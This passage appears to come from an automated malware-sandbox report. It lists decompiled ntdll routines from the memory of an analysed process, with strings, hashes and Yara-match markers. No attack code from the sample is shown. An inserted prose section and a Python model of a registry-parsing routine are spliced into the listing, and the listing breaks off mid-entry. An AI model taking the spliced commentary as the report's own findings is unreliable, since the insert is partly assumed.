                                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                                      									E01257016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a4 != 0x40000003) {
                                                                      							L14:
                                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      							if(E011F7D50() != 0) {
                                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      							} else {
                                                                      								_t87 = 0x7ffe0384;
                                                                      							}
                                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E011F7D50() != 0) {
                                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                                      									E01257016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_v16 = _t125 + 0x24;
                                                                      							_t124 = E0120A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                      							if(_t124 < 0) {
                                                                      								E011DB1E1(_t124, 0x1490, 0, _v16);
                                                                      								goto L8;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 012398A2
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01239891
                                                                      • LdrpCompleteMapModule, xrefs: 01239898
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: f710882251b5c913e253e183791a14eda30f4be4dfe5209261f6f3ead0adc2fd
                                                                      • Instruction ID: 75196112ed11bae53651e483b6938b58cc1b41a753a837f4fb520b4b9be3889c
                                                                      • Opcode Fuzzy Hash: f710882251b5c913e253e183791a14eda30f4be4dfe5209261f6f3ead0adc2fd
                                                                      • Instruction Fuzzy Hash: 8451F371604B469BFB29CBACC988B6A7BE4AB81318F040559EA529B3D1D770ED40C7D1
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011DE620(void* __ecx, short* __edx, short* _a4) {
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				char* _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				char _v64;
                                                                      				void* _v68;
                                                                      				void* _v76;
                                                                      				void* _v84;
                                                                      				signed int _t59;
                                                                      				signed int _t74;
                                                                      				signed short* _t75;
                                                                      				signed int _t76;
                                                                      				signed short* _t78;
                                                                      				signed int _t83;
                                                                      				short* _t93;
                                                                      				signed short* _t94;
                                                                      				short* _t96;
                                                                      				void* _t97;
                                                                      				signed int _t99;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      
                                                                      				_t80 = __ecx;
                                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                      				_t96 = __edx;
                                                                      				_v44 = __edx;
                                                                      				_t78 = 0;
                                                                      				_v56 = 0;
                                                                      				if(__ecx == 0 || __edx == 0) {
                                                                      					L28:
                                                                      					_t97 = 0xc000000d;
                                                                      				} else {
                                                                      					_t93 = _a4;
                                                                      					if(_t93 == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					_t78 = E011DF358(__ecx, 0xac);
                                                                      					if(_t78 == 0) {
                                                                      						_t97 = 0xc0000017;
                                                                      						L6:
                                                                      						if(_v56 != 0) {
                                                                      							_push(_v56);
                                                                      							E012195D0();
                                                                      						}
                                                                      						if(_t78 != 0) {
                                                                      							L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                      						}
                                                                      						return _t97;
                                                                      					}
                                                                      					E0121FA60(_t78, 0, 0x158);
                                                                      					_v48 = _v48 & 0x00000000;
                                                                      					_t102 = _t101 + 0xc;
                                                                      					 *_t96 = 0;
                                                                      					 *_t93 = 0;
                                                                      					E0121BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                      					_v36 = 0x18;
                                                                      					_v28 =  &_v44;
                                                                      					_v64 = 0;
                                                                      					_push( &_v36);
                                                                      					_push(0x20019);
                                                                      					_v32 = 0;
                                                                      					_push( &_v64);
                                                                      					_v24 = 0x40;
                                                                      					_v20 = 0;
                                                                      					_v16 = 0;
                                                                      					_t97 = E01219600();
                                                                      					if(_t97 < 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					E0121BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                      					_push(0);
                                                                      					_v48 = 4;
                                                                      					_t97 = L011DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                      					if(_t97 >= 0) {
                                                                      						if(_v52 != 1) {
                                                                      							L17:
                                                                      							_t97 = 0xc0000001;
                                                                      							goto L6;
                                                                      						}
                                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                                      						_t94 = _t78;
                                                                      						_t83 = _t59;
                                                                      						if(_t59 == 0) {
                                                                      							L19:
                                                                      							if(_t83 == 0) {
                                                                      								L23:
                                                                      								E0121BB40(_t83, _t102 + 0x24, _t78);
                                                                      								if(L011E43C0( &_v48,  &_v64) == 0) {
                                                                      									goto L17;
                                                                      								}
                                                                      								_t84 = _v48;
                                                                      								 *_v48 = _v56;
                                                                      								if( *_t94 != 0) {
                                                                      									E0121BB40(_t84, _t102 + 0x24, _t94);
                                                                      									if(L011E43C0( &_v48,  &_v64) != 0) {
                                                                      										 *_a4 = _v56;
                                                                      									} else {
                                                                      										_t97 = 0xc0000001;
                                                                      										 *_v48 = 0;
                                                                      									}
                                                                      								}
                                                                      								goto L6;
                                                                      							}
                                                                      							_t83 = _t83 & 0x0000ffff;
                                                                      							while(_t83 == 0x20) {
                                                                      								_t94 =  &(_t94[1]);
                                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                                      								_t83 = _t74;
                                                                      								if(_t74 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L23;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      						while(1) {
                                                                      							L14:
                                                                      							_t27 =  &(_t94[1]); // 0x2
                                                                      							_t75 = _t27;
                                                                      							if(_t83 == 0x2c) {
                                                                      								break;
                                                                      							}
                                                                      							_t94 = _t75;
                                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                                      							_t83 = _t76;
                                                                      							if(_t76 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						 *_t94 = 0;
                                                                      						_t94 = _t75;
                                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}
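The decompiled fragment above opens \Registry\Machine\System\CurrentControlSet\Control\NLS\Language with access mask 0x20019 (KEY_READ), queries the value InstallLanguageFallback, rejects any value type other than 1 (REG_SZ), splits the string at the first comma, skips spaces only after the comma, converts each token with the routine at L011E43C0 and writes the two results through the caller's out-pointers; if the second token fails to convert, the first result is zeroed as well and 0xC0000001 (STATUS_UNSUCCESSFUL) is returned. The Python below is an added example that models that control flow so the behaviour can be checked against a value string; it is not code from the report, the sample or Windows. The registry path, the type check and the NTSTATUS values are taken from the fragment; that the converter at L011E43C0 maps a language name to a LANGID is an assumption, and the lookup table standing in for it is constructed.

```python
# Added example modelling the decompiled routine above. Not code from the
# report, the sample or Windows. Taken from the fragment: the registry path,
# the REG_SZ type check (_v52 != 1), the comma/space scanning loops and the
# NTSTATUS values. ASSUMED: the converter called at L011E43C0 maps a language
# name to a LANGID; it is replaced here by a constructed lookup table.
from typing import Optional, Tuple

# Registry location read by the fragment (literal string at xref 011DE68C).
LANGUAGE_KEY = r"\Registry\Machine\System\CurrentControlSet\Control\NLS\Language"
VALUE_NAME = "InstallLanguageFallback"

# NTSTATUS values that appear literally in the fragment. 0xC000000D and
# 0xC0000017 also appear there (invalid-parameter and allocation-failure
# paths) but are reached before the parsing modelled here.
STATUS_SUCCESS = 0x00000000
STATUS_UNSUCCESSFUL = 0xC0000001   # label L17 and the second-token failure path
REG_SZ = 1                         # the only value type the fragment accepts

# Constructed stand-in for the converter at L011E43C0 (assumption, see above).
LANGID_TABLE = {"en-US": 0x0409, "de-DE": 0x0407, "ja-JP": 0x0411}


def split_fallback_value(value: str) -> Tuple[str, str]:
    """Reproduce the two scanning loops (labels L14 and L19).

    L14 walks to the first ',' or the terminator and writes a NUL over the
    comma, so the first token keeps any spaces that precede the comma.  L19
    then skips 0x20 characters at the start of the second token only.
    Returns (first_token, second_token); second_token is "" when there is no
    comma, nothing after it, or only spaces after it.
    """
    comma = value.find(",")
    if comma < 0:
        return value, ""
    first = value[:comma]
    rest = value[comma + 1:]
    i = 0
    while i < len(rest) and rest[i] == " ":
        i += 1
    return first, rest[i:]


def lookup_langid(name: str) -> Optional[int]:
    """Stand-in for L011E43C0; None models its zero ('failed') return."""
    return LANGID_TABLE.get(name)


def get_install_language_fallback(reg_type: int, value: str) -> Tuple[int, int, int]:
    """Mirror the fragment's control flow after the registry query succeeded.

    Returns (status, first_langid, second_langid).  A langid of 0 models an
    out-parameter the routine zeroed up front (*_t96 = 0, *_t93 = 0) or reset
    on failure.
    """
    first_id = second_id = 0
    if reg_type != REG_SZ:               # L17: wrong value type
        return STATUS_UNSUCCESSFUL, first_id, second_id
    first, second = split_fallback_value(value)
    converted = lookup_langid(first)     # L23: the first token must convert
    if converted is None:
        return STATUS_UNSUCCESSFUL, first_id, second_id
    first_id = converted                 # *_v48 = _v56
    if second:                           # *_t94 != 0
        converted = lookup_langid(second)
        if converted is None:
            first_id = 0                 # *_v48 = 0: second-token failure discards the first
            return STATUS_UNSUCCESSFUL, first_id, second_id
        second_id = converted            # *_a4 = _v56
    return STATUS_SUCCESS, first_id, second_id
```

Feeding the model a value such as "en-US ,de-DE" shows the asymmetry worth knowing when reading this routine: spaces before the comma stay attached to the first token and make its conversion fail, while spaces after the comma are skipped. A REG_MULTI_SZ value (type 7) is rejected outright even if its first string would parse.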

Instruction addresses for the function above (side column of the listing, one entry per decompiled line; alignment with the code lines is not preserved in this extract): 0x011de620 to 0x011de743 and 0x0123542a to 0x01235503.

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 011DE68C
                                                                      • InstallLanguageFallback, xrefs: 011DE6DB
                                                                      • @, xrefs: 011DE6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: 8d0102faa908e2528d0c6f33091461f41f23bb4743b7edbaf67001fe95cfdde8
                                                                      • Instruction ID: d59cdc5464308eba60d88ccc541e183b14405df838e9b98a58faf03f11f6118b
                                                                      • Opcode Fuzzy Hash: 8d0102faa908e2528d0c6f33091461f41f23bb4743b7edbaf67001fe95cfdde8
                                                                      • Instruction Fuzzy Hash: 695192B26193469BD718DF68C440A7BB7E8FF98615F05092EFA89D7240F734DA04C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction ID: 7d797ed86f0c0ed04272f4b3b049947d1eb6842ff51f196e0a6d15023ebea63c
                                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction Fuzzy Hash: F291A1712243429FEB24CE2DC841B6BBBE5BF84714F15892DF695CB290E774E904CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: a800e0e3f30f356f832a93a3847c9549bf2704fdc0362e9ec6f77af5a268d802
                                                                      • Instruction ID: 7dd9776dfd2498ec2ff563bc87b5d9cf4867e84ec12d13b84e4e491fb1cc5338
                                                                      • Opcode Fuzzy Hash: a800e0e3f30f356f832a93a3847c9549bf2704fdc0362e9ec6f77af5a268d802
                                                                      • Instruction Fuzzy Hash: 47516E71A20609AFDB64DFA8C980BADBBF8FF58740F14402DEA49EB252D7719940CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011FB9A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: e8c73ca1f1780d4a5f418fb4e40d43db6b4da796fca72f86ce31c7e1ee44cb1e
                                                                      • Instruction ID: cf702ffd9629a6a520727a302acc40ea22c410af90cc37d147d102277e2971a6
                                                                      • Opcode Fuzzy Hash: e8c73ca1f1780d4a5f418fb4e40d43db6b4da796fca72f86ce31c7e1ee44cb1e
                                                                      • Instruction Fuzzy Hash: 43516AB1A18341CFC728CF2DC08092ABBF5FB88614F55896EF69587355D730E844CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: f3dc37c5d8f25abb0cc57008a6091a07b57678c30d9a87b5fc28b3acf7752039
                                                                      • Instruction ID: 8c26ea5622c2ec3a46c03e8f8680cf8bd5b5625c2bbff1fca018bec89a48173a
                                                                      • Opcode Fuzzy Hash: f3dc37c5d8f25abb0cc57008a6091a07b57678c30d9a87b5fc28b3acf7752039
                                                                      • Instruction Fuzzy Hash: C85103B1D2029A8EDF35EF68C844BBEBBB0BF80710F1141EDD959AB282D7704941CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 3b66750b7a5c33fd625d672c0941383f374be2ea32f1d439f1278259554f6ffa
                                                                      • Instruction ID: d2a9d0095752b7f223dadc107f3d231dd5bc132ba5f432e0aa0dda8f6f6f3a04
                                                                      • Opcode Fuzzy Hash: 3b66750b7a5c33fd625d672c0941383f374be2ea32f1d439f1278259554f6ffa
                                                                      • Instruction Fuzzy Hash: 09C1D471D2021ADFDB2ADF98D885BBDBBB5FF48700F14412AE601B7291E774A941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0124BE0F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: 4b585427644944aebce0707fbbf77927554a468bf6b554f580ee719a859469b3
                                                                      • Instruction ID: 4437af713ef138d21983edd9dc7ba1f37679ca53d8a7edc2477400dc5c5a5c84
                                                                      • Opcode Fuzzy Hash: 4b585427644944aebce0707fbbf77927554a468bf6b554f580ee719a859469b3
                                                                      • Instruction Fuzzy Hash: DBA11931B60A07CBE73ACB68C55577AB7A5AF48714F044669EA46CB6C2EB70D841CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: 6325d5725407b6425ab8fb82ceb587102284250b8b229f63ffd35945d7a8bac4
                                                                      • Instruction ID: 8a975ddfc356dfd06568bbc6afa20e99d0d0a649cec3e02b62ea1ba2e0597d6a
• Opcode Fuzzy Hash: 6325d5725407b6425ab8fb82ceb587102284250b8b229f63ffd35945d7a8bac4
• Instruction Fuzzy Hash: 64615431A10666AFEB3ADF6CC980B7EBBB4EB44714F140669EA21972C1C7349940C782
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: `
• API String ID: 0-2679148245
• Opcode ID: fc347d59f82294355d54ba25e47162431cf0c8cd78f161ac981211307649ce12
• Instruction ID: 9a0c94eb492aa3174313d0ccb619e38ca13a119e61727b914d33315a91629d9b
• Opcode Fuzzy Hash: fc347d59f82294355d54ba25e47162431cf0c8cd78f161ac981211307649ce12
• Instruction Fuzzy Hash: 8B51E1713243428FD725DF28D984B2BBBE9EBC4314F44092CFA9697290D770E805CB62
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
• Instruction ID: 51ffef1670676bcdd8b376b19e5bb6a0495725a7292eff8cf22bf4a2f20467df
• Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
• Instruction Fuzzy Hash: 4551AC71214711AFC321DF28C840A6BBBF8FF58714F008A2EFA9597690E7B4E944CB91
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: BinaryHash
• API String ID: 0-2202222882
• Opcode ID: dd12e74442ea2cc90778d0dba8a5e268cc89dbdda2275081c4a9bd70ba659c18
• Instruction ID: b41fbd13b6d506b112ea2e810bb8c1cd37ef565e08d62d72250fc699a35b0f21
• Opcode Fuzzy Hash: dd12e74442ea2cc90778d0dba8a5e268cc89dbdda2275081c4a9bd70ba659c18
• Instruction Fuzzy Hash: 7A4145B2D1052D9FDB61DA50CC84FEEB77CAB54754F0045A5EB09A7240DB309E88CFA8
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: `
• API String ID: 0-2679148245
• Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
• Instruction ID: 2ef2eb1a393f80fc4cfc935699b69487bb291e9902cef6f08fc4060ca547c507
• Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
• Instruction Fuzzy Hash: AB3100326103066FE720DE29CD85F9B7BD9AB84B58F144228FB489B2C0D670E914CB95
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: BinaryName
• API String ID: 0-215506332
• Opcode ID: 013b312573fd906bb7f6c03de8a9401931edb04503fcfceb1c009b0836641eab
• Instruction ID: 6d8fc57925d14082744a74832cbd8ae8ae84cfbc125ee50a4ce2cd16d6d32e27
• Opcode Fuzzy Hash: 013b312573fd906bb7f6c03de8a9401931edb04503fcfceb1c009b0836641eab
• Instruction Fuzzy Hash: EC31E3B291151AAFEB15DA59C985E7BFBB4FF80BA0F014169EE14A7290D7309E00C7A0
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 73f8c9cfdd6353a105509dc041e1397873b03bff536bbba2ed18cdc1abb726ad
• Instruction ID: 950bbe3610131bcbbfbaf13397e7db065a5f38bdcbfae9b9655b7a942d5f0076
• Opcode Fuzzy Hash: 73f8c9cfdd6353a105509dc041e1397873b03bff536bbba2ed18cdc1abb726ad
• Instruction Fuzzy Hash: B231E9B15693099FC312DFA8C88196BBBE8FB95654F000A2EF58483291D734DD05CF92
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: WindowsExcludedProcs
• API String ID: 0-3583428290
• Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
• Instruction ID: a9ba5ec4cff7eb41f69e267f8a510dce3d93968f973cff89ba09bdc93f9bf1ab
• Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
• Instruction Fuzzy Hash: 862128BA501A19BBDF269A998944FABBBEDAF91A10F060065FE04CB200D730DD11C7A1
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: Actx
• API String ID: 0-89312691
• Opcode ID: 0a5622495f5cc7832c26715f534556ebdab8c8952a426dc16d66433a255b1983
• Instruction ID: 81d8c7f4842b1b8720a6e69defd7c44ca2a14f9e1a7cf2b9559a94b2a73241b5
• Opcode Fuzzy Hash: 0a5622495f5cc7832c26715f534556ebdab8c8952a426dc16d66433a255b1983
• Instruction Fuzzy Hash: F711E677304E438BE72C4E1D8494736F695AB85624F2A472EE761DB3A1DBF0D8038342
Uniqueness

Uniqueness Score: -1.00%

Strings
• Critical error detected %lx, xrefs: 01288E21
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: Critical error detected %lx
• API String ID: 0-802127002
• Opcode ID: 430e59c9503e5870e93c71c9d2543301ef41f7ba3810abc343b79c425c21b505
• Instruction ID: 603871bd8d30897232e3b749277dc0d05ba79e7c90f0bfa90b34971beec212a4
• Opcode Fuzzy Hash: 430e59c9503e5870e93c71c9d2543301ef41f7ba3810abc343b79c425c21b505
• Instruction Fuzzy Hash: 68115B71D25349EBDF29DFA885057EDBBB0BB14314F20825DE569AB2D2C7744601CF14
Uniqueness

Uniqueness Score: -1.00%

Strings
• NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0126FF60
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
• API String ID: 0-1911121157
• Opcode ID: 59686bfd735779d06c5cdc1bef5c1ef2fde3b801922d05907b62ec23e062b357
• Instruction ID: 7cf7201fe32a38c3c29aeb6eeece8611b99faa312325b60308873986dc62020f
• Opcode Fuzzy Hash: 59686bfd735779d06c5cdc1bef5c1ef2fde3b801922d05907b62ec23e062b357
• Instruction Fuzzy Hash: CE110471930145EFDF26DB54C989FAC7BB1FF04B04F148044E2045B1E1C7399980CB90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: c67b05065d3e6e41236aa262ab9c8abc984a9ac18acbd8721d7564452735a9ca
• Instruction ID: 74e13e160383035cbeb5df080f7a97611b855e5b523b5793568c8809e5f59e15
• Opcode Fuzzy Hash: c67b05065d3e6e41236aa262ab9c8abc984a9ac18acbd8721d7564452735a9ca
• Instruction Fuzzy Hash: F5C08C07A0A08008D2018C0968403B1FF608383229E0821D6CD4CAB003C002C19882CC
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9846852527c12fec8fd2e4f2c12518ec11b7c0fdcc737ff90dbe1c1985b59321
• Instruction ID: 4fa583be9955d4dd6749970199f6be27e151e500d9611a25cc292c92fb6affcd
• Opcode Fuzzy Hash: 9846852527c12fec8fd2e4f2c12518ec11b7c0fdcc737ff90dbe1c1985b59321
• Instruction Fuzzy Hash: 4642607592021ACFDB24CF68C840BAABBB1FF45704F5481AADA4DEB342D7749985CF50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 93d7c2a2292258b29d038eaf658403e39edeedf5cca0cc98b8c26aec5d311496
• Instruction ID: 8b021028e443417129883f2115934739e6eb11f80921083388426bf01661ac24
• Opcode Fuzzy Hash: 93d7c2a2292258b29d038eaf658403e39edeedf5cca0cc98b8c26aec5d311496
• Instruction Fuzzy Hash: 72F17D746182128FD728CF19C480A7BB7E1FF98714F05492EF69ACB691E734D885CB52
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0c95efa6e69d432f0d925728a17deae3aff7c6170057fb9f7fa963dd47e164b
• Instruction ID: 69a3677075a530d6a10711e1159eac79c541f9c41ffdb359ee3f956c6f0186cf
• Opcode Fuzzy Hash: d0c95efa6e69d432f0d925728a17deae3aff7c6170057fb9f7fa963dd47e164b
• Instruction Fuzzy Hash: C4F1F635628342DFE72BCB2CC44476ABBE1AF85714F04861EEA959B3C2D774D841CB82
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dce6ba19b80eb5422b944f398f95364617f8325b493038e831de447b81c17d8
• Instruction ID: bfb16199a5880ae331255c99ee60a4e532d918a437ba098971671f9ca415cea9
• Opcode Fuzzy Hash: 2dce6ba19b80eb5422b944f398f95364617f8325b493038e831de447b81c17d8
• Instruction Fuzzy Hash: C2E1C370A10B5A8FEF39CFA8D858B69B7F2BF85308F054199DA0957291D730AD81CF52
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82deb76c405e82796c50cc9a2e77d125d9db00bdb0c899cf2735ff926b56a408
• Instruction ID: 21e28a0c23e5fcebed7937a012671d7f74eba7024a53f91e2005a686a7e78f18
• Opcode Fuzzy Hash: 82deb76c405e82796c50cc9a2e77d125d9db00bdb0c899cf2735ff926b56a408
• Instruction Fuzzy Hash: 7BB13CB0E1060ADFDB19DFD9C988AADBBF5FF99304F104129E605AB245E770A941CF90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 155b18e6ef7254de2619b4c3f3db62a6ffeadf1054509902a20a35b2965086a4
• Instruction ID: e045f539523a3ff81d23469b1c741631c2c2f82e528d7f9f3b9836aa0b5db854
